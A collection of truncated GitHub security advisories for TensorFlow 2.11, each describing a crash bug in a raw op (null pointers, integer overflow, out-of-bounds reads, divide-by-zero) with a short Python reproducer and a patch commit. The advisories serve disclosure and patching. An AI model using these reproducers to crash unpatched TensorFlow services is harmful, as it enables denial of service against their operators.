Source
ghsa
### Impact When the parameter `summarize` of `tf.raw_ops.Print` is zero, the new method `SummarizeArray<bool>` will reference to a nullptr, leading to a seg fault. ```python import tensorflow as tf tf.raw_ops.Print(input = tf.constant([1, 1, 1, 1],dtype=tf.int32), data = [[False, False, False, False], [False], [False, False, False]], message = 'tmp/I', first_n = 100, summarize = 0) ``` ### Patches We have patched the issue in GitHub commit [6d423b8bcc9aa9f5554dc988c1c16d038b508df1](https://github.com/tensorflow/tensorflow/commit/6d423b8bcc9aa9f5554dc988c1c16d038b508df1). The fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us...
### Impact TFversion 2.11.0 //tensorflow/core/ops/array_ops.cc:1067 const Tensor* hypothesis_shape_t = c->input_tensor(2); std::vector<DimensionHandle> dims(hypothesis_shape_t->NumElements() - 1); for (int i = 0; i < dims.size(); ++i) { dims[i] = c->MakeDim(std::max(h_values(i), t_values(i))); } if hypothesis_shape_t is empty, hypothesis_shape_t->NumElements() - 1 will be integer overflow, and the it will deadlock ```python import tensorflow as tf para={ 'hypothesis_indices': [[]], 'hypothesis_values': ['tmp/'], 'hypothesis_shape': [], 'truth_indices': [[]], 'truth_values': [''], 'truth_shape': [], 'normalize': False } tf.raw_ops.EditDistance(**para) ``` ### Patches We have patched the issue in GitHub commit [08b8e18643d6dcde00890733b270ff8d9960c56c](https://github.com/tensorflow/tensorflow/commit/08b8e18643d6dcde00890733b270ff8d9960c56c). The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1 ### For...
### Impact When ctx->step_containter() is a null ptr, the Lookup function will be executed with a null pointer. ```python import tensorflow as tf tf.raw_ops.TensorArrayConcatV2(handle=['a', 'b'], flow_in = 0.1, dtype=tf.int32, element_shape_except0=1) ``` ### Patches We have patched the issue in GitHub commit [239139d2ae6a81ae9ba499ad78b56d9b2931538a](https://github.com/tensorflow/tensorflow/commit/239139d2ae6a81ae9ba499ad78b56d9b2931538a). The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1 ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by Yu Tian
### Impact ```python import os os.environ['TF_ENABLE_ONEDNN_OPTS'] = '0' import tensorflow as tf print(tf.__version__) with tf.device("CPU"): ksize = [1, 40, 128, 1] strides = [1, 128, 128, 30] padding = "SAME" data_format = "NHWC" orig_input_shape = [11, 9, 78, 9] grad = tf.saturate_cast(tf.random.uniform([16, 16, 16, 16], minval=-128, maxval=129, dtype=tf.int64), dtype=tf.float32) res = tf.raw_ops.AvgPoolGrad( ksize=ksize, strides=strides, padding=padding, data_format=data_format, orig_input_shape=orig_input_shape, grad=grad, ) ``` ### Patches We have patched the issue in GitHub commit [ddaac2bdd099bec5d7923dea45276a7558217e5b](https://github.com/tensorflow/tensorflow/commit/ddaac2bdd099bec5d7923dea45276a7558217e5b). The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1 ### For more information Please consult [our security guide](https://github.com/ten...
### Impact When `SparseSparseMaximum` is given invalid sparse tensors as inputs, it can give an NPE. ```python import tensorflow as tf tf.raw_ops.SparseSparseMaximum( a_indices=[[1]], a_values =[ 0.1 ], a_shape = [2], b_indices=[[]], b_values =[2 ], b_shape = [2], ) ``` ### Patches We have patched the issue in GitHub commit [5e0ecfb42f5f65629fd7a4edd6c4afe7ff0feb04](https://github.com/tensorflow/tensorflow/commit/5e0ecfb42f5f65629fd7a4edd6c4afe7ff0feb04). The fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by Yu Tian of Qihoo 360 AIVul Team
### Impact version:2.11.0 //core/ops/audio_ops.cc:70 Status SpectrogramShapeFn(InferenceContext* c) { ShapeHandle input; TF_RETURN_IF_ERROR(c->WithRank(c->input(0), 2, &input)); int32_t window_size; TF_RETURN_IF_ERROR(c->GetAttr("window_size", &window_size)); int32_t stride; TF_RETURN_IF_ERROR(c->GetAttr("stride", &stride)); .....[1] DimensionHandle input_length = c->Dim(input, 0); DimensionHandle input_channels = c->Dim(input, 1); DimensionHandle output_length; if (!c->ValueKnown(input_length)) { output_length = c->UnknownDim(); } else { const int64_t input_length_value = c->Value(input_length); const int64_t length_minus_window = (input_length_value - window_size); int64_t output_length_value; if (length_minus_window < 0) { output_length_value = 0; } else { output_length_value = 1 + (length_minus_window / stride); .....[2] } output_length = c->MakeDim(output_length_value); } Get the value of stride at [1], and the used at [2] ```python import tensorflow as tf para = {'input': tf...
### Impact Integer overflow occurs when 2^31 <= num_frames * height * width * channels < 2^32, for example Full HD screencast of at least 346 frames. ```python import urllib.request dat = urllib.request.urlopen('https://raw.githubusercontent.com/tensorflow/tensorflow/1c38ad9b78ffe06076745a1ee00cec42f39ff726/tensorflow/core/lib/gif/testdata/3g_multiframe.gif').read() import tensorflow as tf tf.io.decode_gif(dat) ``` ### Patches We have patched the issue in GitHub commit [8dc723fcdd1a6127d6c970bd2ecb18b019a1a58d](https://github.com/tensorflow/tensorflow/commit/8dc723fcdd1a6127d6c970bd2ecb18b019a1a58d). The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1 ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by ...
### Impact Attackers using Tensorflow can exploit the vulnerability. They can access heap memory which is not in the control of user, leading to a crash or RCE. When axis is larger than the dim of input, c->Dim(input,axis) goes out of bound. Same problem occurs in the QuantizeAndDequantizeV2/V3/V4/V4Grad operations too. ```python import tensorflow as tf @tf.function def test(): tf.raw_ops.QuantizeAndDequantizeV2(input=[2.5], input_min=[1.0], input_max=[10.0], signed_input=True, num_bits=1, range_given=True, round_mode='HALF_TO_EVEN', narrow_range=True, axis=0x7fffffff) test() ``` ### Patches We have patched the issue in GitHub commit [7b174a0f2e40ff3f3aa957aecddfd5aaae35eccb](https://github.com/tensorflow/tensorflow/commit/7b174a0f2e40ff3f3aa957aecddfd5aaae35eccb). The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow...
### Impact If the stride and window size are not positive for `tf.raw_ops.AvgPoolGrad`, it can give an FPE. ```python import tensorflow as tf import numpy as np @tf.function(jit_compile=True) def test(): y = tf.raw_ops.AvgPoolGrad(orig_input_shape=[1,0,0,0], grad=[[[[0.39117979]]]], ksize=[1,0,0,0], strides=[1,0,0,0], padding="SAME", data_format="NCHW") return y print(test()) ``` ### Patches We have patched the issue in GitHub commit [1295ae4dbb52fe06b19733b0257e2340d7b63b8d](https://github.com/tensorflow/tensorflow/commit/1295ae4dbb52fe06b19733b0257e2340d7b63b8d). The fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by r3pwnx of 360 AIVul Team
### Impact NPE in QuantizedMatMulWithBiasAndDequantize with MKL enable ```python import tensorflow as tf func = tf.raw_ops.QuantizedMatMulWithBiasAndDequantize para={'a': tf.constant(138, dtype=tf.quint8), 'b': tf.constant(4, dtype=tf.qint8), 'bias': [[31.81644630432129, 47.21876525878906], [109.95201110839844, 152.07968139648438]], 'min_a': 141.5337138686371, 'max_a': [73.84139251708984, 173.15280151367188], 'min_b': [], 'max_b': [[16.128345489501953, 193.26820373535156]], 'min_freezed_output': [], 'max_freezed_output': [115.50032806396484, 156.974853515625], 'Toutput': 1.0, 'transpose_a': True, 'transpose_b': False, 'input_quant_mode': 'MIN_FIRST'} func(**para) ``` ### Patches We have patched the issue in GitHub commit [8a47a39d9697969206d23a523c977238717e8727](https://github.com/tensorflow/tensorflow/commit/8a47a39d9697969206d23a523c977238717e8727). The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1 ### For more information...